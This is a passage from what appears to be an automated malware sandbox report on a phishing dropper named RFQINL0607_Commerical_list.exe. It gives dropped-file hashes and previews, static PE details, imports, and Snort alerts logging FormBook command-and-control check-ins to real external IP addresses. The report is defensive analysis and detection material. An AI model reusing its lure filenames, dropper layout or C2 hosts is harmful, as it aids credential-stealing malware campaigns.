                                                                                                                                                                                Entropy (8bit):7.9803584933431715
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:Qww8Eo9Ibm/KxxLVPk3Dzpj+rgI10cnoCYrwD01hnFkB4yvSn6CF3:Q4gmSpPQBig40pn1hnqWUS6CJ
                                                                                                                                                                                MD5:A6599FF2FE6558A99D69ABA9DA0F5080
                                                                                                                                                                                SHA1:84D6F1F3312377BF652BCB1BF24D39DEA8B6073A
                                                                                                                                                                                SHA-256:BD56F6F2AD98DBD0D609CA59AE5FF1415DF842002C057D9ABCDD8B8456B00C91
                                                                                                                                                                                SHA-512:56D381BD32EC0FA3C0DEB74B9FAD2A04FAB1B59ADC83D27BFDD982F13D3015712D12E23EC9440779E4E1EB319B41989EE7F8B45862E9D116CC157F924511A4A9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:^6:i.....lYt..%.R....."......~....4.....[z...B.....pq2...e....}.f......."`.U...].... w..........$L.Jb7.C.B.'_..T/W.,..x...G.,2).u%.&..G......l...\.S5...e..c.QU.i.3j...Yl...E._...V..JL.~B..r.............$..Kn....eHk&i......=.^2.p...+.*..Z.^.z...R.u.6.+.R._|K.3)9.u.&G..b.=.[.w.m.Sm1.Q.NK.fV.[....U...vH.l..r.IK.=|(`.......,\..]...U.zSF.d....iH]......%.i.S...s3...c..n.m._.^.........m..8..e%.Zu.Rn.k%..P....P...\..^n.h..W0.Kp1..k..D........[o...(5..)..YZ..51+...1^.$.......}..Jha.18^.5.P..`.........E.....ik....t......C.....*.+...N."....HK...qCf....a6...t..y3...[U]z.....C3..qGH@%]gB9..u.XE,H......^.;L.y.1 .,....'....G...8.....Y.!.8.....o.....L....@.y..L....OV...<l.j..?Xm....&..n..0$....:..s.....d.o}+.V......Q.A.Fb......[..y.Jx.vG......:k".B.t.f.l..*..+..L.).w\...7D.5!z.......zr..4.H...X.......S^...!.\...\.+8B)...n4..%L.xL.q.{IW/.b..S~.Hf]}...38.s5d(...!.(K.Uql.E."Z.}.B.a..9-.pE.~......8._.@.uBI.j.......t...>.[.....jj.gWW....!.N...a_.......T"x.

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Campanulated\Mullite\Desiderant\Nysted\Repletively.fly

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8976
                                                                                                                                                                                Entropy (8bit):7.977652930965763
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:4IxYY5PVQddl7YIesrUUy+nD+4Y0vidPUJ8WdkUk:xMddl7YIesrUanDY0voP+dkUk
                                                                                                                                                                                MD5:4242008625237BB8911C255E2EDE0E4C
                                                                                                                                                                                SHA1:CBFB3329B5BB6F2DB326B03E5BD91B888920CD8B
                                                                                                                                                                                SHA-256:A92A35083552429EDE69B95B902D0D776F9FCCD8D72A074CE83159A8E3761B21
                                                                                                                                                                                SHA-512:0ECB38148C64F99BB07D8A3534C8B0348F0970D7415706FF646F4E03A56DF98C4D17CB5011AC19C5B2E1A548D260CC0DD8388F7EEAAC45F9D8E1B678789F4A71
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview::...m.|...X1...@...U.c.#7.V.,..^N...z...zd........EW........H..9.95[..4....Z"..-y..g....v^.w<Vf.d.[owV.r[.#....`w...L....U...I....m.W..>...!.D.7P.L..q.v.........w.C.....u.....o..+...-./.=..0..\....Y...y.Y...WA....Wl..).L.E.H.G..|O4.....ZyM."_)..K....K....:v9.E!._......"...t\.f.. ;7...1...@.=..G..b..j.Ks.c..:i.....'...*.v.BH.IE.$...?.w.\...m..v:.E$.qI.b+.U.C.rN..<..........s....v.R.1C.@.S)....qR...(.......D....{..&S!..........>...%>.+.=........b ..6D...M#z......P.1.S{..W.u....7...6...).....v...\....0@Y.|`..........N9.......Wy..8..S+..jdb.v..Uu+...q.Tb-oWzV.S..W1...w..}...`./....t.j...6.N..W.(xi}..k&P....O_.).d..g..n........M.[C9..~..m.t.......`8.gwV...y..].(...........N.i>..F,...Ve.H...t-.e..?.o..u0.......\....)`...........(.i.....L..hv.n.7.=.)...h..Z......I..n...0..`..K].c.Pp...-.O.3.._...U......0&.=A>.....vb.:..b..F5j....5!O...ty.>mo0..TJ0.n.'HBK..w...n@q>...H...@A"@K/+...T]..H5q....e.....Z.V.|...w.._.w?`.lb.......%....-.F...h...

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Campanulated\Mullite\Desiderant\Nysted\Rick.sel

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines (55530), with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):55530
                                                                                                                                                                                Entropy (8bit):2.6804760738549227
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:YfEO3Ije57eOYXW5qzBSfHr0EfLbPRn7Y+5g3G2yqgSLd/aiRm/hYLyAnTFn0s4b:Yp4jeX4NST5fg3G9B/+2sT6j
                                                                                                                                                                                MD5:EA22018CDF9842049CEB96341D5F8634
                                                                                                                                                                                SHA1:38442325B656B410C31E3CE3147EE9DE060165E0
                                                                                                                                                                                SHA-256:1BF934315A2E272689972C188A0D1687AF9EBF730B0F3C95274CD8C1AC1A53E0
                                                                                                                                                                                SHA-512:476E0A7030DDFCC7DEE2FBC896B320C72ECF1A06A11772C4AE3521C718094BD43E6BB229B271D74C98D4FCA7506FA658B68579E0620C2E1E9A7A087EAC7A5A1C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:0000BDBD0000000000000028008B8B8B00ED009A00A2A2A2000000000000F5000000151500000000BE0000000070007474747400000091003A00D6D6D6D6D60000000000DF00007000000000E700747400000000710000A8A800000000004040003A000000E2E2000000000000E60000000000C1C1C10070700000E50000000000BDBDBDBDBDBDBD0000B40000E60000E5E5E50000000C00F00000003F3F3F3F3F0000000048484848000000CA0069690071717100009C006E0000949400E1000039393939393900838383004646007D7D7D00008B8B0000003B004040400001010000003E3E3E00C5C5C5004F0000000000181800242400000000000000A10000777700560000001B00F1F100A1005D005800004500004F4F00BEBE0000008900840000C9C9C9000039000000004500000A0071000000000000006A00BF00B500D3000083838300000000CDCDCDCD00000600004A4A00F5F500006A00000000B80054006400C1C1C1C10000007500008C00007900C7C700F8F800E1000000002F2F0000000000D5D5D5D5D500001200F3F3000028282800950000090000F3F3F3009E007E7E000000000000AA00002525252525252500000000ABABABABAB00009F9F9F00004A4A4A00A3A3A3A3A300000000CBCB0000C8C80000787800C6000043000000EDEDED006F6F0000ACAC008484009A

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Campanulated\Mullite\Desiderant\Nysted\Udturs.yen

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):11312
                                                                                                                                                                                Entropy (8bit):7.984584016572502
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:u9sRfdxXpsa6OwgqsgpyqNLihi5S3ECmbgAZqVCFTB8dal0Zs4IfTsQxtvcazphH:u9idxXpsa6O9rarNLihi5SsZ0CFTB8TS
                                                                                                                                                                                MD5:67520F1622D71C41BBA1DE659A566AD1
                                                                                                                                                                                SHA1:52CE44CBDF881FE2DFD5ABE7EA825636C3B08404
                                                                                                                                                                                SHA-256:8D24F29E852E4421956FC34F7BC2A491CDA2FD8D79C6AE89A0523FF177B4218B
                                                                                                                                                                                SHA-512:3ACBD93D0D7BDC258538653CAB0E79A003E5C7C85446BB380D13A7CAFE58AA36B66B20F30DDD15EE3769F15C69F56FE976348D1412A04CEFDE959D4E93B1A5F6
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:;_X...<.'=...(...q.a....Wv.G=.A.]D2X."[.........Gk..2...]Ub\.\l-...E..ISb:..J..:....:/t.N..9...r.h..%.d" ....#.>r.(.h .[.V(....[x...m...k.....$/......Q.|u.....2[.S_....TZ.z..N...).Pv/...m3........s|<...6^1u.......y.!\u.'...f6%.a@K0O.u...q.vb. -..B....Yr..f.O.x.G9.3t..L..e.....Z..... .c.W*..a.z..V.M.|G..a.|..3..x.2G...;.^.".p.CU..fHw\./..)...A.<.zV.Z..p.JH....w$!......M...J...|-..'#.k9#D8.w0.h0f...}.4d#2.Z...;...#q.....gEy.9.h......._.v.%.y/_.{.+.........I..H.3..)....B......c....O...5.F^..h..-...-...5jc"'.'...t4.\r.u.<!.].aU.cI9i.R.m........T.....r...x.#.T)......2.~....8..X.U.u..H........y..._.........g.....r..u.PO.5.....!.....6.-...r..P.j.s#I.s..;'.8]...[..9.K...9..p........[..L^A<Z..|.k@".~...k..4....d)..0...N.....5.9..5.~II..XF\..;b....7=.....6.!.8....#B?B....}..V}..._...}..I]..H...b.....=..t......."...S.(..lw..^...L:{.=./!.Y...^R.....?v&y..7..G........i.....Xe....d....^g{.<..........C..]y..@9..6..`1+t.....Hg3?a.2..^h..O..

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\anissenes.Bra

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):262829
                                                                                                                                                                                Entropy (8bit):7.676417387166298
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:EozTS+thGmvSglvuqz+FTo9aeiQs93P9SiHUpS3tKKMWRmbwbdcVJmkhxnXa+qLJ:1hLvSOakjC9/9ST/K7CV5xX5qsH9anj5
                                                                                                                                                                                MD5:F34C19032D3917735973FF48B711E117
                                                                                                                                                                                SHA1:6E1D898EE5703E8421A8A1F7C9CF9F7DEDDE043B
                                                                                                                                                                                SHA-256:E33F7B6446E957857279C29531968E1E4DAB84127E1BC2E088EDF6F6515FEC5B
                                                                                                                                                                                SHA-512:0CD1234082182BFFECD2378245EFA5B23A4EA267439E8FE13A8070C1D8F5365EEB60B0A2A9802A2333BF407F9B05C4DC10E17B066F9CE43DC9B89F69A319484A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.......S.vv..lll..==.R...........00000.............b....]]......zz.m...YY.........ssss..........ss...P.............ss..............9.......].JJ........b....gg............E.......DD.................N......`.''...............j.I......jj.oo..'.ccc.i.................|..............Q...h.........................$..}}}...................:.............................2.tttttt........q....<............p....OOO.........t.l........kkk..........c......+++..77.7.......................--..@....................77........x..."........f..........b.FF........:....oo....pppp...U..............::...\\.....^^.\.OOO..5.......5..................z...k........x.RR................HH......................................y.......||..................\.++..........+++.....**...........}................................ss..................~.kk...yy........DD...9....OO.......................ee.....t....dd.jjjjjjj.......33..K.'''.....................nnn......33..............................-.$.p.............B....qq.AA.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):11264
                                                                                                                                                                                Entropy (8bit):5.770824470205811
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:PPtkumJX7zB22kGwfy0mtVgkCPOs81un:E702k5qpds8Qn
                                                                                                                                                                                MD5:B8992E497D57001DDF100F9C397FCEF5
                                                                                                                                                                                SHA1:E26DDF101A2EC5027975D2909306457C6F61CFBD
                                                                                                                                                                                SHA-256:98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
                                                                                                                                                                                SHA-512:8823B1904DCCFAF031068102CB1DEF7958A057F49FF369F0E061F1B4DB2090021AA620BB8442A2A6AC9355BB74EE54371DC2599C20DC723755A46EDE81533A3C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                • Filename: BNP2022.zip, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Request_for_Quotation_0032118_doc.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Request_for_Quotation_0032118_doc.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: request for quotation 0032118 doc.zip, Detection: malicious, Browse
                                                                                                                                                                                • Filename: POS2303OC.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: POS2303OC.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Wells_Fargo_Transfer_Receipt.pif.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Wells_Fargo_Transfer_Receipt.pif.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Signed-sale-contract_addendum_129KB_0000000000000000000000000000000000.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Signed-sale-contract_addendum_129KB_0000000000000000000000000000000000.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Scanned_file_PO23_Jan.html, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Scanned_file_PO23_Jan.html, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Order-Requirment.xls, Detection: malicious, Browse
                                                                                                                                                                                • Filename: Alard inquiry list.xls, Detection: malicious, Browse
                                                                                                                                                                                • Filename: DHL_Shipment_Notification_Waybill_Number_9400184528.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: DHL_Shipment_Notification_Waybill_Number_9400184528.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: 2023 Annual Transfer list & Terminated Employees.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: 2023 Annual Transfer list & Terminated Employees.exe, Detection: malicious, Browse
                                                                                                                                                                                • Filename: dWzOw1VU1S.exe, Detection: malicious, Browse
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....z.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                Entropy (8bit):6.201711573479939
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                File name:RFQINL0607_Commerical_list.exe
                                                                                                                                                                                File size:696'162 bytes
                                                                                                                                                                                MD5:eebe8af538e906f4f2422dfa7c448962
                                                                                                                                                                                SHA1:61cb7d8c06bafc6bedb63bd27525fe15e8b6fc53
                                                                                                                                                                                SHA256:3ab67edd421427d8e26c522fde52b72e0822fab92f3a4dae0b5305e2b908f15a
                                                                                                                                                                                SHA512:2823a229e6bed65a0fec513faaf7ec33c2dc4642950efa7ab10a19ca99031ad69ea66cf8e3e020f7a468ef702dc476d0edc6c83565060a0bf3b0dfcddfe66eb3
                                                                                                                                                                                SSDEEP:12288:8ZFpdY/RmislKBHr/ro6AhgQwO0pMb8WhXrqmYli17vmyYdIQbFrd:oaslKBHr/s6O0Kb8Wh+EexdIQbFr
                                                                                                                                                                                TLSH:CDE4F1927FCB4E27C0A34B764AD38325F338ED406A174B076B54BA7D9D316926B032D6
                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....z.W.................`...|.....

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:c71f36734d3a0903

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x40310f
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                Time Stamp:0x57017AB3 [Sun Apr 3 20:18:59 2016 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                sub esp, 00000184h
                                                                                                                                                                                push ebx
                                                                                                                                                                                push esi
                                                                                                                                                                                push edi
                                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                                push 00008001h
                                                                                                                                                                                mov dword ptr [esp+18h], ebx
                                                                                                                                                                                mov dword ptr [esp+10h], 00409198h
                                                                                                                                                                                mov dword ptr [esp+20h], ebx
                                                                                                                                                                                mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                                call dword ptr [004070A8h]
                                                                                                                                                                                call dword ptr [004070A4h]
                                                                                                                                                                                cmp ax, 00000006h
                                                                                                                                                                                je 00007F725C51E423h
                                                                                                                                                                                push ebx
                                                                                                                                                                                call 00007F725C521391h
                                                                                                                                                                                cmp eax, ebx
                                                                                                                                                                                je 00007F725C51E419h
                                                                                                                                                                                push 00000C00h
                                                                                                                                                                                call eax
                                                                                                                                                                                mov esi, 00407298h
                                                                                                                                                                                push esi
                                                                                                                                                                                call 00007F725C52130Dh
                                                                                                                                                                                push esi
                                                                                                                                                                                call dword ptr [004070A0h]
                                                                                                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                cmp byte ptr [esi], bl
                                                                                                                                                                                jne 00007F725C51E3FDh
                                                                                                                                                                                push ebp
                                                                                                                                                                                push 00000009h
                                                                                                                                                                                call 00007F725C521364h
                                                                                                                                                                                push 00000007h
                                                                                                                                                                                call 00007F725C52135Dh
                                                                                                                                                                                mov dword ptr [0042E404h], eax
                                                                                                                                                                                call dword ptr [00407044h]
                                                                                                                                                                                push ebx
                                                                                                                                                                                call dword ptr [00407288h]
                                                                                                                                                                                mov dword ptr [0042E4B8h], eax
                                                                                                                                                                                push ebx
                                                                                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                                                                                push 00000160h
                                                                                                                                                                                push eax
                                                                                                                                                                                push ebx
                                                                                                                                                                                push 00428828h
                                                                                                                                                                                call dword ptr [00407174h]
                                                                                                                                                                                push 00409188h
                                                                                                                                                                                push 0042DC00h
                                                                                                                                                                                call 00007F725C520F87h
                                                                                                                                                                                call dword ptr [0040709Ch]
                                                                                                                                                                                mov ebp, 00434000h
                                                                                                                                                                                push eax
                                                                                                                                                                                push ebp
                                                                                                                                                                                call 00007F725C520F75h
                                                                                                                                                                                push ebx
                                                                                                                                                                                call dword ptr [00407154h]

                                                                                                                                                                                Rich Headers

                                                                                                                                                                                Programming Language:
                                                                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x75340xa0.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x420000x578f0.rsrc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                .text0x10000x5fdd0x6000False0.6784261067708334data6.499724004795778IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rdata0x70000x13520x1400False0.4583984375data5.207538993430304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .data0x90000x254f80x600False0.4544270833333333data4.0323505938358934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .ndata0x2f0000x130000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .rsrc0x420000x578f00x57a00False0.3664045782810271data3.7340704391272856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                Resources

                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                RT_ICON0x422f80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.35674024321685355
                                                                                                                                                                                RT_ICON0x843200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.38215722228794513
                                                                                                                                                                                RT_ICON0x94b480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.42479253112033194
                                                                                                                                                                                RT_ICON0x970f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.4397279549718574
                                                                                                                                                                                RT_ICON0x981980x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.46885245901639344
                                                                                                                                                                                RT_ICON0x98b200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5354609929078015
                                                                                                                                                                                RT_DIALOG0x98f880x100dataEnglishUnited States0.5234375
                                                                                                                                                                                RT_DIALOG0x990880x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                RT_DIALOG0x991a80xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                RT_DIALOG0x992700x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                RT_GROUP_ICON0x992d00x5adataEnglishUnited States0.7777777777777778
                                                                                                                                                                                RT_VERSION0x993300x27cdataEnglishUnited States0.5345911949685535
                                                                                                                                                                                RT_MANIFEST0x995b00x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                                                                                                                USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                                                                                ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                                                                Possible Origin

                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Snort IDS Alerts

                                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                192.168.11.2085.10.194.22849932802031412 08/23/23-09:30:44.545161TCP2031412ET TROJAN FormBook CnC Checkin (GET)4993280192.168.11.2085.10.194.228
                                                                                                                                                                                192.168.11.2031.31.198.6149942802031412 08/23/23-09:34:09.129231TCP2031412ET TROJAN FormBook CnC Checkin (GET)4994280192.168.11.2031.31.198.61
                                                                                                                                                                                192.168.11.20150.95.255.3849944802031412 08/23/23-09:35:30.833388TCP2031412ET TROJAN FormBook CnC Checkin (GET)4994480192.168.11.20150.95.255.38
                                                                                                                                                                                192.168.11.20198.54.117.21249928802031412 08/23/23-09:29:42.718305TCP2031412ET TROJAN FormBook CnC Checkin (GET)4992880192.168.11.20198.54.117.212
                                                                                                                                                                                192.168.11.20154.205.111.16349943802031412 08/23/23-09:34:50.183718TCP2031412ET TROJAN FormBook CnC Checkin (GET)4994380192.168.11.20154.205.111.163
                                                                                                                                                                                192.168.11.2043.154.67.17049936802031412 08/23/23-09:31:25.801441TCP2031412ET TROJAN FormBook CnC Checkin (GET)4993680192.168.11.2043.154.67.170
                                                                                                                                                                                192.168.11.2092.205.50.7349947802031412 08/23/23-09:36:32.743918TCP2031412ET TROJAN FormBook CnC Checkin (GET)4994780192.168.11.2092.205.50.73
                                                                                                                                                                                192.168.11.2091.195.240.12349948802031412 08/23/23-09:36:52.935537TCP2031412ET TROJAN FormBook CnC Checkin (GET)4994880192.168.11.2091.195.240.123
                                                                                                                                                                                192.168.11.20185.53.179.9149938802031412 08/23/23-09:32:47.291633TCP2031412ET TROJAN FormBook CnC Checkin (GET)4993880192.168.11.20185.53.179.91
                                                                                                                                                                                192.168.11.20188.114.97.349937802031412 08/23/23-09:32:26.954532TCP2031412ET TROJAN FormBook CnC Checkin (GET)4993780192.168.11.20188.114.97.3
